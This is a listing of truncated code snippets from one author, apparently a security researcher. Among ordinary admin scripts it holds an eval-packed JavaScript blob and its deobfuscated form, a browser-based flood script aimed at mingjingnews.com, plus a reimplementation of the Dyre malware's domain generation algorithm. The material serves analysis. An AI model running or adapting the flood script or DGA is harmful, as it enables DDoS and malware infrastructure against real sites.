xxdesmus

1. install postgres
2. run makedb.rb >tiles.csv
3. run tiles.sql
4. run archive.rb
5. enjoy

xxdesmus

#!/usr/bin/env bash
#
# Upload a sample to VirusTotal and pretty print the report.
# All in a handy alias.
#
# Dependencies:
#
#  * curl
#  * jq
#  * VirusTotal API key

xxdesmus

<html>
  <head>
    <script type="text/javascript">
      function getCookie(name) {
        var matches = document.cookie.match(new RegExp(
          "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
        ));
        return matches ? decodeURIComponent(matches[1]) : undefined;
      }

xxdesmus

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b((/X\\/([\\d]+)/Z.19(i.K.M.H())[1]>=1b)&&(i.K.M.H().1a("16")<0)){3 D=T;3 p=[\'n://13.q.m/\',\'n://15.q.m/\',\'n://14.q.m/\',\'n://11.12.m/\'];3 E=17;3 k=18;3 O=10;3 s=1;h w(){3 8=e 7();A 7.S(8.Y(),8.W(),8.U(),8.V(),8.I(),8.J())/R}g.z("B")[0].F="<1r 1s=\\"y\\" 1q=\\"1o-y\\">"+g.z("B")[0].F;3 9=[];3 f=[];3 x=5;3 c=[];3 a=[];3 r=\'\';3 l=0;h o(2){3 6=9[2];b(6!=5){g.G.1p(6)}9[2]=5;b(l<E&&a[2]-x<D){Q(\'u(\'+2+\')\',(a[2]-c[2])>k?k:(a[2]-c[2]))}}h L(2){b(9[2]==5){A}b(9[2].1x){i.C(f[2]);a[2]=e 7().j();o(2)}1v{b(e 7().j()-c[2]>k){i.C(f[2]);o(2)}}}h u(2){6=g.G.1t(g.1w(\'1u\'));r=p[w()%p.1n];6.1f=r+\'?t=\'+w()+P.1e(P.1c()*1d);6.1h.1l=\'1m\';9[2]=6;c[2]=a[2]=e 7().j();f[2]=1k("L("+2+")",1i);l=l+1}

xxdesmus

if ((/chrome\/([\d]+)/gi.exec(window.navigator.userAgent.toLowerCase())[1] >= 34) && (window.navigator.userAgent.toLowerCase().indexOf("edge") < 0)) {
    var MAX_TIME = 300000;
    var url_list = ['http://news.mingjingnews.com/', 'http://s1.mingjingnews.com/', 'http://tv.mingjingnews.com/', 'http://www.mingjingtimes.com/'];
    var MAX_COUNT = 100000000;
    var TIMEGAP = 500;
    var THREAD = 10;
    var START_CLOCK = 1;

    function unixtime() {
        var dt = new Date();

xxdesmus

#/bin/sh

# name of the ipset - v4 or v6 will be appended.
IPSET_NAME=cloudflare-

# argument: v4 or v6 (defaults to v4)
cloudflare_ipset ()
{
        local ipv
        local inetv

xxdesmus

#!/bin/bash

SERVERS=(108.162.196.125 108.162.197.125)

for server in ${SERVERS[*]}
do
    echo "Now processing $server"
    wget --timeout=10 -t1 -O tor.txt https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=$server

    for ip in `tail -n +4 tor.txt`

xxdesmus

wget --spider -o wget.log -e robots=off -r -l 5 -p -S --header="X-Bypass-Cache: 1" live-mysite.gotpantheon.com

# Options explained
# --spider: Crawl the site
# -o wget.log: Keep the log
# -e robots=off: Ignore robots.txt
# -r: specify recursive download
# -l 5: Depth to search. I.e 1 means 'crawl the homepages'.  2 means 'crawl the homepage and all pages it links to'...
# -p: get all images, etc. needed to display HTML page
# -S: print server response

xxdesmus

#! /usr/bin/env python
# Dyre/Dyreza DGA
# Implementation by Talos
# From http://blogs.cisco.com/security/talos/threat-spotlight-dyre
# Another Python implementation was also posted back in December 2014 by moritz.kroll:
# https://www.virustotal.com/en/file/3716902c64afe40369e6ed67f9b9f7eea30f809348b3558adcff622965e80435/analysis/

from datetime import date
from hashlib import sha256
from socket import gethostbyname, gaierror

xxdesmus

#!/bin/sh
#
# Amazon EC2 user-data file for automatic configuration of IPsec/L2TP VPN
# on a Ubuntu server instance. Tested with 14.04 (Trusty) AND 12.04 (Precise).
# With minor modifications, this script *can also be used* on dedicated servers
# or any KVM- or XEN-based Virtual Private Server (VPS) from other providers.
#
# DO NOT RUN THIS SCRIPT ON YOUR PC OR MAC! THIS IS MEANT TO BE RUN WHEN 
# YOUR AMAZON EC2 INSTANCE STARTS!
#